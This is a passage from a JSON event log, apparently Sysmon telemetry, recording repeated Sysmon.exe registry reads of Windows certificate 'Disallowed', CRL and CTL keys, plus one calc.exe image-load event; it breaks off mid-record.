"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573247610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "InputHost.dll", - "image_path": "C:\\Windows\\System32\\InputHost.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246360000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 